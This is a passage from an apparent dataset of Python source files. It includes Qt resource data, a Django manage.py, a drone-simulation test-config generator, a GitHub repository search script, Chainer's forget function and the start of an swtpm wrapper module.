sodipo\\\ndi:nodetypes=\\x22cc\\\n\\x22 />\\x0a <path\\x0a \\\n style=\\x22fil\\\nl:none;fill-rule\\\n:evenodd;stroke:\\\n#37c8ab;stroke-w\\\nidth:16;stroke-l\\\ninecap:round;str\\\noke-linejoin:mit\\\ner;stroke-miterl\\\nimit:4;stroke-da\\\nsharray:none;str\\\noke-opacity:1\\x22\\x0a \\\n d=\\x22m 134.9\\\n6147,95.594487 -\\\n79.795108,0.0945\\\n\\x22\\x0a id=\\x22pat\\\nh812-3\\x22\\x0a i\\\nnkscape:connecto\\\nr-curvature=\\x220\\x22\\x0a\\\n sodipodi:\\\nnodetypes=\\x22cc\\x22 /\\\n>\\x0a </g>\\x0a</svg>\\x0a\\\n\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x05\\\n\\x00o\\xa6S\\\n\\x00i\\\n\\x00c\\x00o\\x00n\\x00s\\\n\\x00\\x10\\\n\\x0e\\xa2zG\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00d\\x00e\\x00f\\x00a\\x00u\\x00l\\x00t\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x09\\\n\\x0c\\xb6\\xa9\\xc7\\\n\\x00s\\\n\\x00a\\x00v\\x00e\\x00c\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0f\\\n\\x0b7\\x0bg\\\n\\x00m\\\n\\x00a\\x00p\\x00 \\x00(\\x00n\\x00i\\x00g\\x00h\\x00t\\x00)\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0c\\\n\\x06\\xeb\\x9c'\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00o\\x00u\\x00t\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x07\\\n\\x03\\x83Z'\\\n\\x00m\\\n\\x00a\\x00p\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0b\\\n\\x05\\x03\\x96\\xa7\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00i\\x00n\\x00.\\x00s\\x00v\\x00g\\\n\"\n\nqt_resource_struct = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\xd8\\xa5\\\n\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x07\\xbd\\x15\\\n\\x00\\x00\\x00r\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\xcd\\x02\\\n\\x00\\x00\\x00N\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x18y\\\n\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x10\\xd1\\\n\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\"\n\ndef qInitResources():\n QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n"} {"ext": "py", "sha": "1a313097295e5d2b5e64ec97ffdbc0634712a8db", "content": "# pylint: disable=unused-import\n\ntry:\n import 
json\nexcept ImportError:\n try:\n import simplejson as json\n except ImportError as ie:\n raise ImportError(\n 'No json library installed.'\n ' Try running `pip install simplejson` to install a compatible json library.'\n ) from ie\n"} {"ext": "py", "sha": "1a3131e465579d8b854f24dd4633a3d07fe8600b", "content": "\"\"\"Define mapping of litex components to generated zephyr output\"\"\"\n\n\nclass Mapping:\n \"\"\"Mapping from litex component to generated zephyr output\n\n :param name: Name of the mapping, only used during debugging\n :type name: str\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n"} {"ext": "py", "sha": "1a31324f25e519d75abd088f1d1fb58983c3cab4", "content": "\"\"\"\nWe introduce some useful functions to print attributes of target object.\n\"\"\"\nimport sys\nimport functools\nimport itertools\n\n__all__ = ['display', 'camel_attr_print', 'trace']\n\ndef trace(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n print('%s(%r, %r) -> %r' % (func.__name__, args, kwargs, result))\n return result\n\n return wrapper\n\n\ndef _decorator_write_to_file(file):\n def wrapper(func):\n if not _validate_file_object(file):\n print(\"File doesn't have write() method. Print to sys.stdout\\n\")\n return func\n else:\n @functools.wraps(func)\n def nfunc(*args, **kwargs):\n return func(*args, file=file, **kwargs)\n\n return nfunc\n\n return wrapper\n\n\ndef _validate_file_object(file):\n if not hasattr(file, 'write'):\n return False\n return True\n\n\ndef display(obj, tp, *args, file=sys.stdout, **kwargs):\n \"\"\"\n :param obj: specify your input object. It can be anything available in Python.\n :param tp: specify the type of what you want to print. It can be 'state', 'attr', 'func', 'item'.\n :param file: print the output to the file. the file must have write() method.\n\n >>>import numpy as np\n >>>display(np, 'attr', 'array')\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: array\n attribute: <built-in function array>\n >>>display(np, 'func', 'array', [313])\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n function: array\n function in: ([313],) {}\n function return: [313]\n >>>display('1 in [1,32,4]', 'state')\n statement: 1 in [1,32,4]\n return: True\n >>>display('1 in a', 'state', {'a':[1,2,3,4]})\n statement: 1 in a\n return: True\n >>>display([1,3,23], 'item', 0)\n object: [1, 3, 23]\n item sequence: (0,)\n item return: 1\n >>>display([[23,424],3,23], 'item', 0, 1)\n object: [[23, 424], 3, 23]\n item sequence: (0, 1)\n item return: 424\n \"\"\"\n if file != sys.stdout:\n mprint = _decorator_write_to_file(file)(print)\n else:\n mprint = print\n if tp == 'item':\n _display_item(obj, *args, mprint=mprint)\n elif tp == 'attr':\n _display_attr(obj, *args, mprint=mprint)\n elif tp == 'func':\n _display_func(obj, *args, mprint=mprint, **kwargs)\n elif tp == 'state':\n _display_state(obj, *args, mprint=mprint)\n else:\n print('Sorry, please choose a type \"item\", \"attr\", \"func\", \"state\"')\n\n\ndef camel_attr_print(obj, file=sys.stdout):\n \"\"\"\n :param obj: specify your input object. It can be anything available in Python.\n :param file: print the output to the file. 
the file must have write() method.\n\n >>>import numpy as np\n >>>camel_attr_print(np)\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: __NUMPY_SETUP__\n attribute: False\n\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: __all__\n ...\n \"\"\"\n if not _validate_file_object(file):\n print(\"File doesn't have write() method. Print to sys.stdout\\n\")\n file = sys.stdout\n i = itertools.filterfalse(_find_not_camel, dir(obj))\n display(obj, 'attr', *i, file=file)\n\n\ndef _find_not_camel(s):\n if s.startswith('__') and s not in ('__doc__', '__builtins__'):\n return False\n else:\n return True\n\n\ndef _display_attr(obj, *attrs, mprint=print):\n mprint('object:', obj)\n for attr in attrs:\n mprint('attribute name:', attr)\n attr = getattr(obj, attr)\n mprint('attribute:', attr)\n mprint('')\n\n\ndef _display_func(obj, func, *args, mprint=print, **kwargs):\n mprint('object:', obj)\n mprint('function:', func)\n attr = getattr(obj, func)\n mprint('function in:', args, kwargs)\n mprint('function return:', attr(*args, **kwargs))\n mprint('')\n\n\ndef _display_item(obj, *items, mprint=print):\n mprint('object:', obj)\n mprint('item sequence:', items)\n r = obj\n for item in items:\n r = r[item]\n mprint('item return:', r)\n mprint('')\n\n\ndef _display_state(statement, *args, mprint=print):\n mprint('statement:', statement)\n mprint('return:', eval(statement, *args))\n mprint('')\n"} {"ext": "py", "sha": "1a3132fb9d9999df45804cb13b6a7594d0adf92a", "content": "#!/usr/bin/env python3\n#\n# Synthesis-based resolution of features/enforcers interactions in CPS\n# Copyright 2020 Carnegie Mellon University.\n# NO WARRANTY. THIS CARNEGIE MELLON UNIVERSITY AND SOFTWARE ENGINEERING\n# INSTITUTE MATERIAL IS FURNISHED ON AN \"AS-IS\" BASIS. CARNEGIE MELLON\n# UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED,\n# AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR\n# PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF\n# THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY\n# KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT\n# INFRINGEMENT.\n# Released under a BSD (SEI)-style license, please see license.txt or contact\n# permission@sei.cmu.edu for full terms.\n# [DISTRIBUTION STATEMENT A] This material has been approved for public\n# release and unlimited distribution. Please see Copyright notice for\n# non-US Government use and distribution.\n# This Software includes and/or makes use of the following Third-Party Software\n# subject to its own license:\n# 1. 
JsonCpp\n# (https://github.com/open-source-parsers/jsoncpp/blob/master/LICENSE)\n# Copyright 2010 Baptiste Lepilleur and The JsonCpp Authors.\n# DM20-0762\n#\n\nimport sys\nimport os\nimport numpy as np\nimport pathlib\nimport itertools\nimport random\nimport json\n\n# Assume ego starts 0,0 always\n# Just relative to ego at varying distances\nenemy_start_positions = [\n '5,5',\n '5,0',\n '0,5',\n '-5,5',\n '5,-5',\n '-5,-5',\n '-5,0',\n '0,-5',\n\n '1,1',\n '1,0',\n '0,1',\n '-1,1',\n '1,-1',\n '-1,-1',\n '-1,0',\n '0,-1',\n\n '10,10',\n '10,0',\n '0,10',\n '-10,10',\n '10,-10',\n '-10,-10',\n '-10,0',\n '0,-10',\n ]\n \n# Config values that will be changed\nconfig_vals = {\n 'ENEMY_DRONE_SPEED' : [x for x in np.arange(1.2, 2.1, 0.1)],\n 'WAYPOINT_SEED' : [x for x in range(0, 999)], # Kinda dumb way to do this space-wise but it's fine\n 'BOUNDARY_SIZE' : [x for x in np.arange(10, 30, 1)],\n # 'SUGGEST_ACTION_RANGE' : [0,1]\n}\n\n# FLIGHT_WEIGHT stays constant\nweight_vals = [\n # Equal weights\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1, 'MISSILE_WEIGHT' : 1},\n\n # 1 : 1.5 : 2\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1.5,'MISSILE_WEIGHT' : 2},\n {'BOUNDARY_WEIGHT' : 1,'MISSILE_WEIGHT' : 1.5,'RUNAWAY_WEIGHT' : 2},\n \n {'RUNAWAY_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 1.5,'MISSILE_WEIGHT' : 2},\n {'RUNAWAY_WEIGHT' : 1,'MISSILE_WEIGHT' : 1.5,'BOUNDARY_WEIGHT' : 2},\n\n {'MISSILE_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1.5,'BOUNDARY_WEIGHT' : 2},\n {'MISSILE_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 1.5,'RUNAWAY_WEIGHT' : 2},\n\n # 1 : 2 : 3\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 2,'MISSILE_WEIGHT' : 3},\n {'BOUNDARY_WEIGHT' : 1,'MISSILE_WEIGHT' : 2,'RUNAWAY_WEIGHT' : 3},\n \n {'RUNAWAY_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 2,'MISSILE_WEIGHT' : 3},\n {'RUNAWAY_WEIGHT' : 1,'MISSILE_WEIGHT' : 2,'BOUNDARY_WEIGHT' : 3},\n\n {'MISSILE_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 2,'BOUNDARY_WEIGHT' : 3},\n {'MISSILE_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 2,'RUNAWAY_WEIGHT' : 3},\n]\n \ndef make_config_file(base_config_file, outfile, vals):\n # Open input and output file\n with open(base_config_file, 'r') as base, open(outfile, 'w') as out:\n # Convert to list by space delim\n for line in base:\n line_lst = line.split(' ')\n \n # If this var is one we change, then write what's stored in vars\n if(line_lst[0] in vals):\n # Handle the case that it's a float differently bc annoying precision\n if isinstance(line_lst[0], np.float64):\n out.write(line_lst[0] + ' ' + '{:.2f}'.format(vals[line_lst[0]]) + '\\n')\n else:\n out.write(line_lst[0] + ' ' + str(vals[line_lst[0]]) + '\\n')\n # If this var is not one we change, write it as is\n else:\n out.write(line)\n\ndef default(o):\n if isinstance(o, np.int64): return int(o) \n raise TypeError\n\ndef make_files(config, rootdir, enemy_start_positions, num_configurations):\n newdir = ''\n\n # They're all the same at this point -- just get the vals for any coordinator\n vals = config[\"RobustnessCoordinator\"]\n \n # Get all the combinations of variable-values we have\n combinations = [dict((zip(vals.keys(), t))) for t in itertools.product(*vals.values())]\n \n sample_size = num_configurations\n \n # Get a random sample of the combinations\n comb_sample = random.sample(combinations, sample_size)\n\n # Randomly assign weights to each case\n for entry in comb_sample:\n weights = random.choice(weight_vals)\n entry.update(weights)\n\n for coordinator in config:\n try:\n newdir = rootdir+'/'+coordinator\n os.makedirs(newdir, exist_ok=True)\n except OSError:\n print(\"Failed to create directory: %s\" % 
newdir)\n\n i=0\n\n # Create a directory and a corresponding config file for each test case\n for entry in comb_sample:\n\n # Everything else is random so this is fine\n enemy_start_pos_str = enemy_start_positions[i%len(enemy_start_positions)]\n i = i+1\n \n # Need to add this manually bc it's not in config file params\n controlled_vars = entry.copy();\n controlled_vars[\"enemy_strt_pos\"] = enemy_start_pos_str;\n\n dirname = ''\n for name in entry:\n if isinstance(entry[name], np.float64):\n dirname+=name+'{:.2f}'.format(entry[name])+'-'\n else:\n dirname+=name+str(entry[name])+'-'\n \n # trim the hyphen off the end\n dirname = dirname[0:-1]\n \n try:\n os.makedirs(rootdir+'/'+coordinator+'/'+dirname, exist_ok=True)\n except OSError:\n print(\"Failed to create directory: %s\" % rootdir+'/'+coordinator+'/'+dirname)\n\n # Write config file\n make_config_file('./drone.cfg', rootdir+coordinator+'/'+dirname+'/'+'drone.cfg', entry)\n\n with open(rootdir+coordinator+'/'+dirname+'/'+'controlled_vars.json', 'w') as controlled_varsfile:\n json.dump(controlled_vars, controlled_varsfile, default=default)\n # Write positions\n with open(rootdir+coordinator+'/'+dirname+'/'+'enemy_start_pos', 'wb') as posfile:\n posfile.write(enemy_start_pos_str.encode('utf-8'))\n\ndef main():\n if(len(sys.argv) != 3):\n print(\"Usage: generate_tests.py <test_dir> <num_configurations>\")\n exit()\n cwd = os.getcwd()\n os.makedirs(sys.argv[1], exist_ok=True)\n num_configurations = int(sys.argv[2])\n rootdir = cwd+'/'+sys.argv[1]+'/'\n \n if((cwd.split('/'))[-1] != 'missionapp'):\n print(\"Must be in missionapp directory to use this script. Given %s\\n\" % cwd)\n print(cwd.split('/'))\n exit()\n\n base_config_file = 'drone.cfg'\n\n coordinators = ['PriorityCoordinator', 'RobustnessCoordinator', 'SynthRobustnessCoordinator']\n \n config = { coord : config_vals.copy() for coord in coordinators }\n\n make_files(config, rootdir, enemy_start_positions, num_configurations)\n \nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a313475913ca2ebb1ad14d72612228b49fbce63", "content": "def test_dummy():\n assert 1 == 1\n # this is just a dummy test\n # add meaningful tests "} {"ext": "py", "sha": "1a3135009e8a95578bfe5f70efc5e350b6a417e8", "content": "#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\n\n\ndef main():\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'photo_frame.settings')\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? 
Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a3137073d8f07d24e2551a07bd100679fdf6451", "content": "from time import sleep\nimport datetime\nimport getpass\nimport keyring\nimport traceback\nfrom github import Github\n\nDEBUG = False\nearliest = datetime.datetime(2012,1,1)\n \ndef getAERepos(username):\n count = 0\n try:\n\tg = Github(username, getGithubPassword(username))\n\tfor repo in g.legacy_search_repos('app engine'):\n\t count += 1\n\t try:\n\t #if repo.updated_at > earliest or repo.pushed_at > earliest:\n\t if repo.pushed_at > earliest:\n\t\ttry:\n\t\t print '{0};{1};{2};{3};{4};{5};{6};{7};{8}'.format(\n\t\t repo.name,\n\t\t repo.created_at.date(),\n\t\t repo.updated_at.date(),\n\t\t repo.pushed_at.date(),\n\t\t repo.owner.login,\n\t\t repo.language,\n\t\t repo.forks,\n\t\t repo.watchers,\n\t\t repo.description)\n\t\texcept:\n\t\t\tprint 'ERROR unable to print description of repo {0}'.format(repo.name)\n\t \tif DEBUG and count > 10: \n\t break\n\t if 'appscale' in repo.name.lower():\n\t print '\\tFound AppScale!' \n\t except:\n\t print 'ERROR1 unable to get repo'\n\t sleep(2)\n except:\n\tprint 'ERROR2 unable to get anything'\n\t\t\n \ndef printRepository(username):\n\tg = Github(username, getGithubPassword(username))\n \n\tuser = g.get_user()\n\trepositories = user.get_repos()\n \n\tfor repository in repositories:\n\t\tprint repository.name\n\t\tprintBranches(repository)\n \ndef printBranches(repository):\n\tfor branch in repository.get_branches():\n\t\tprint ' ', branch.name\n\t\ttree = branch.commit.commit.tree\n\t\tprintTree(repository, tree, ' ')\n \ndef printTree(repository, tree, indent):\n\tfor element in tree.tree:\n\t\tprint indent, element.path\n\t\tif element.type == 'tree':\n\t\t\tprintTree(repository, repository.get_git_tree(element.sha), indent + ' ')\n \ndef getGithubPassword(username):\n\tservice = 'github'\n\tpassword = keyring.get_password(service, username)\n\tif password == None:\n\t\tprint \"Enter password for user\", username\n\t\tpassword = getpass.getpass()\n\t\tkeyring.set_password(service, username, password)\n\treturn password\n \n# Pass your Github username as a parameter\n#printRepository('ckrintz')\n\n# step through the repos with keyword 'app engine'\ngetAERepos('ckrintz')\n"} {"ext": "py", "sha": "1a3137092d366e49dc9666d6765222f9382bd4cb", "content": "from chainer import cuda\nfrom chainer import function\nfrom chainer import variable\n\n\nclass _DummyFunction(function.Function):\n\n def __init__(self, grads):\n self.grads = grads\n\n def forward(self, inputs):\n xp = cuda.get_array_module(*inputs)\n return xp.array(0),\n\n def backward(self, inputs, outputs):\n return self.grads\n\n\nclass Forget(function.Function):\n\n def __init__(self, func):\n if not callable(func):\n raise TypeError('func must be callable')\n\n self.func = func\n\n def _call_func(self, xs):\n outs = self.func(*xs)\n\n if isinstance(outs, tuple):\n for i, out in enumerate(outs):\n if isinstance(out, variable.Variable):\n continue\n n = i + 1\n suffix = {1: 'st', 2: 'nd', 3: 'rd'}.get(\n n if n < 20 else n % 10, 'th')\n msg = ('{}{} element of a returned tuple is not Variable, '\n 'but is {}').format(n, suffix, type(out))\n raise RuntimeError(msg)\n elif isinstance(outs, variable.Variable):\n outs = (outs,)\n else:\n msg = ('A tuple of Variables or a Variable are expected, but {} '\n 'is returned.'.format(type(outs)))\n raise RuntimeError(msg)\n\n 
return outs\n\n def forward(self, inputs):\n xs = [variable.Variable(x, volatile=True) for x in inputs]\n outs = self._call_func(xs)\n return tuple(out.data for out in outs)\n\n def backward(self, inputs, grads):\n xs = [variable.Variable(x, volatile=False) for x in inputs]\n outs = self._call_func(xs)\n _DummyFunction(grads)(*outs).backward()\n return tuple(x.grad for x in xs)\n\n\ndef forget(func, *xs):\n \"\"\"Call a function without storing internal results.\n\n On a forward propagation Chainer stores all internal results of\n :class:`Function` on a computational graph as they are required on\n backward-propagation. These results consume too much memory when the\n internal results are too large. This method **forgets** such internal\n results on forward propagation, and still supports back-propagation with\n recalculation.\n\n In a forward propagation, this method calls a given function with given\n variables without creating a computational graph. That means, no internal\n results are stored. In a backward propagation this method calls the given\n function again to create a computational graph to execute back-propagation.\n\n This method reduces internal memory usage. Instead it requires more\n calculation time as it calls the function twice.\n\n .. admonition:: Example\n\n Let ``f`` be a function defined as:\n\n >>> def f(a, b):\n ... return a + b + a\n\n and, ``x`` and ``y`` be :class:`~chainer.Variable`:\n\n >>> x = chainer.Variable(np.random.uniform(-1, 1, 5).astype('f'))\n >>> y = chainer.Variable(np.random.uniform(-1, 1, 5).astype('f'))\n\n When ``z`` is calculated as ``z = f(x, y)``, its internal result\n ``x + y`` is stored in memory. Instead if you call ``f`` with\n :meth:`forget`:\n\n >>> z = F.forget(f, x, y)\n\n internal ``x + y`` is forgotten.\n\n .. note::\n\n The method does not support functions behaving randomly, such as\n :meth:`~chainer.functions.dropout` and\n :meth:`~chainer.functions.negative_sampling`. It is because first results\n of these function differ from the second one.\n\n Args:\n func (callable): A function to call. It needs to be called with\n :class:`~chainer.Variable` object(s) and to return a\n :class:`~chainer.Variable` object or a tuple of\n :class:`~chainer.Variable` objects.\n xs (~chainer.Variable): Argument variables of the function.\n\n Returns:\n ~chainer.Variable: A variable ``func`` returns. 
If it returns a tuple,\n the method returns a tuple too.\n\n \"\"\"\n return Forget(func)(*xs)\n"} {"ext": "py", "sha": "1a3137dba4cd2e166fcbfa7612dd486edeeb7ff7", "content": "\n\"\"\" tpm.py\n\nWrapper classes for swtpm\n\"\"\"\n\n# pylint: disable=R0902,R0913,R0914,C0302,W0703\n\n\n#\n# swtpm_setup.py\n#\n# Authors: Stefan Berger <stefanb@linux.ibm.com>\n#\n# (c) Copyright IBM Corporation 2020\n#\n\nimport os\nimport socket\nimport struct\nimport subprocess\nimport time\n\n# TPM1.2 imports\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes, hmac\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers\n\nfrom py_swtpm_setup.swtpm_utils import logit, logerr, sha1\n\nCMD_INIT = 0x2\nCMD_SHUTDOWN = 0x3\nCMD_GET_INFO = 0x12\n\nTPMLIB_INFO_TPMSPECIFICATION = 1\nTPMLIB_INFO_TPMATTRIBUTES = 2\n\n#\n# swtpm base class for TPM 1.2 and TPM 2.0\n#\nclass Swtpm:\n \"\"\" Swtpm is the base class for usage of swtpm as TPM 1.2 or TPM 2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass, is_tpm2=False):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n self.swtpm_exec_l = swtpm_exec_l\n self.state_path = state_path\n self.keyopt = keyopt\n self.logfile = logfile\n self.fds_to_pass = fds_to_pass\n self.is_tpm2 = is_tpm2\n\n self.pidfile = None\n self.swtpm_proc = None\n self.data_client_socket = None\n self.data_swtpm_socket = None\n self.ctrl_client_socket = None\n self.ctrl_swtpm_socket = None\n\n # Probe the socket domain; Linux only has socket.AF_UNIX, Cygwin AF_INET\n self.socket_domain = socket.AF_UNIX\n try:\n s1, s2 = socket.socketpair(self.socket_domain)\n s1.close()\n s2.close()\n except ValueError: # Cygwin gives a ValueError\n self.socket_domain = socket.AF_INET\n\n def start(self):\n \"\"\" The start method starts the TPM 2 \"\"\"\n\n self.pidfile = os.path.join(self.state_path, \".swtpm_setup.pidfile\")\n cmdline = self.swtpm_exec_l.copy()\n\n if self.is_tpm2:\n cmdline.extend([\"--tpm2\"])\n\n if self.keyopt:\n cmdline.extend([\"--key\", self.keyopt])\n\n cmdline.extend([\"--flags\", \"not-need-init\",\n \"--tpmstate\", \"dir=%s\" % self.state_path,\n \"--pid\", \"file=%s\" % self.pidfile])\n # cmdline.extend([\"--log\", \"file=/tmp/log,level=20\"])\n\n ctr = 0\n while ctr < 100:\n self.data_client_socket, self.data_swtpm_socket = socket.socketpair(self.socket_domain,\n socket.SOCK_STREAM)\n os.set_inheritable(self.data_swtpm_socket.fileno(), True)\n\n self.ctrl_client_socket, self.ctrl_swtpm_socket = socket.socketpair(self.socket_domain,\n socket.SOCK_STREAM)\n os.set_inheritable(self.ctrl_swtpm_socket.fileno(), True)\n\n r_cmdline = cmdline.copy()\n r_cmdline.extend([\"--server\", \"type=tcp,fd=%d\" % self.data_swtpm_socket.fileno(),\n \"--ctrl\", \"type=unixio,clientfd=%d\" %\n self.ctrl_swtpm_socket.fileno()])\n\n self.remove_pidfile()\n\n # print(\"starting swtpm: %s\\n\" % r_cmdline)\n try:\n pass_fds = [self.data_swtpm_socket.fileno(),\n self.ctrl_swtpm_socket.fileno()]\n pass_fds.extend(self.fds_to_pass)\n\n self.swtpm_proc = subprocess.Popen(r_cmdline, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, pass_fds=pass_fds)\n except Exception as err:\n logerr(self.logfile,\n \"Failed to start swtpm %s: %s\\n\" % (\" \".join(self.swtpm_exec_l), str(err)))\n\n ctr += 1\n\n ctr2 = 0\n while True:\n # Is it still running?\n if self.swtpm_proc.poll():\n stderr = 
self.swtpm_proc.communicate()[0]\n print(\"TPM died? %s\\n\" % stderr)\n self.stop()\n break\n\n if os.path.exists(self.pidfile):\n print(\"TPM is listening on Unix socket.\")\n return 0\n\n ctr2 += 1\n time.sleep(0.05)\n\n if ctr2 == 40:\n self.stop()\n break\n\n return 1\n\n def remove_pidfile(self):\n \"\"\" Remove the pidfile if it exists \"\"\"\n\n if self.pidfile:\n try:\n os.remove(self.pidfile)\n except Exception:\n pass\n\n def stop(self):\n \"\"\" Stop the running swtpm instance \"\"\"\n\n if self.swtpm_proc:\n if not self.swtpm_proc.poll():\n self.ctrl_shutdown()\n try:\n self.swtpm_proc.wait(timeout=0.5)\n except subprocess.TimeoutExpired:\n self.swtpm_proc.kill()\n self.swtpm_proc.wait()\n self.swtpm_proc = None\n self.remove_pidfile()\n\n for sock in [self.data_client_socket, self.data_swtpm_socket,\n self.ctrl_client_socket, self.ctrl_swtpm_socket]:\n if sock:\n sock.close()\n self.data_client_socket = None\n self.data_swtpm_socket = None\n self.ctrl_client_socket = None\n self.ctrl_swtpm_socket = None\n\n def destroy(self):\n \"\"\" Destroy the running swtpm instance \"\"\"\n\n self.stop()\n\n def transfer(self, req, cmdname, use_ctrl=False):\n \"\"\" Send a command to swtpm and receive a response \"\"\"\n\n if use_ctrl:\n sock = self.ctrl_client_socket\n offset = 0\n else:\n sock = self.data_client_socket\n offset = 6\n\n try:\n sock.sendall(req)\n rsp = sock.recv(4096)\n except Exception as err:\n logerr(self.logfile, \"transfer error: %s\\n\" % str(err))\n return None, 1\n\n if not use_ctrl:\n if len(rsp) < 10:\n logerr(self.logfile,\n \"Response for %s has only %d bytes.\\n\" % (cmdname, len(rsp)))\n return None, 1\n\n returncode = struct.unpack(\">I\", rsp[offset:offset+4])[0]\n if returncode != 0:\n logerr(self.logfile, \"%s failed: 0x%x\\n\" % (cmdname, returncode))\n return None, 1\n\n return rsp, 0\n\n def ctrl_init(self):\n \"\"\" Send an Init over the control channel \"\"\"\n\n req = struct.pack(\">I I\", CMD_INIT, 0)\n _, ret = self.transfer(req, \"CMD_INIT\", use_ctrl=True)\n return ret\n\n def ctrl_shutdown(self):\n \"\"\" Send an Init over the control channel \"\"\"\n\n req = struct.pack(\">I\", CMD_SHUTDOWN)\n _, ret = self.transfer(req, \"CMD_SHUTDOWN\", use_ctrl=True)\n return ret\n\n def ctrl_get_tpm_specs_and_attrs(self):\n \"\"\" Get the TPM specification parameters over the control channel \"\"\"\n\n req = struct.pack(\">I QII\", CMD_GET_INFO,\n TPMLIB_INFO_TPMSPECIFICATION | TPMLIB_INFO_TPMATTRIBUTES, 0, 0)\n rsp, ret = self.transfer(req, \"CMD_GET_INFO\", use_ctrl=True)\n if ret != 0:\n return \"\", 1\n\n length = struct.unpack(\">I\", rsp[8:12])[0]\n # compensate for null-terminated string\n length -= 1\n data = struct.unpack(\"%ds\" % length, rsp[12:12+length])[0]\n\n return data.decode(), 0\n\n#\n# TPM 2 support\n#\n\nTPM2_ST_NO_SESSIONS = 0x8001\nTPM2_ST_SESSIONS = 0x8002\n\nTPM2_CC_EVICTCONTROL = 0x00000120\nTPM2_CC_NV_DEFINESPACE = 0x0000012a\nTPM2_CC_PCR_ALLOCATE = 0x0000012b\nTPM2_CC_CREATEPRIMARY = 0x00000131\nTPM2_CC_NV_WRITE = 0x00000137\nTPM2_CC_NV_WRITELOCK = 0x00000138\nTPM2_CC_STARTUP = 0x00000144\nTPM2_CC_SHUTDOWN = 0x00000145\nTPM2_CC_GETCAPABILITY = 0x0000017a\n\nTPM2_SU_CLEAR = 0x0000\n\nTPM2_RH_OWNER = 0x40000001\nTPM2_RS_PW = 0x40000009\nTPM2_RH_ENDORSEMENT = 0x4000000b\nTPM2_RH_PLATFORM = 0x4000000c\n\nTPM2_ALG_RSA = 0x0001\nTPM2_ALG_SHA1 = 0x0004\nTPM2_ALG_AES = 0x0006\nTPM2_ALG_SHA256 = 0x000b\nTPM2_ALG_SHA384 = 0x000c\nTPM2_ALG_SHA512 = 0x000d\nTPM2_ALG_SHA3_256 = 0x0027\nTPM2_ALG_SHA3_384 = 0x0028\nTPM2_ALG_SHA3_512 = 
